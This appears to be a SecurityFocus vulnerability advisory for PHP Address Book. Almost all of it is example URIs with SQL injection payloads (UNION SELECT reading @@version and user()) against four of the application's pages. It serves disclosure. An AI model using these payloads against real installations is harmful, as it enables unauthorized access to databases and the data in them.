PHP Address Book Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

]http://www.example.com/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23
http:///www.example.com//[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%
http:///www.example.com//[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23
http:///www.example.com/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23


 

Privacy Statement
Copyright 2010, SecurityFocus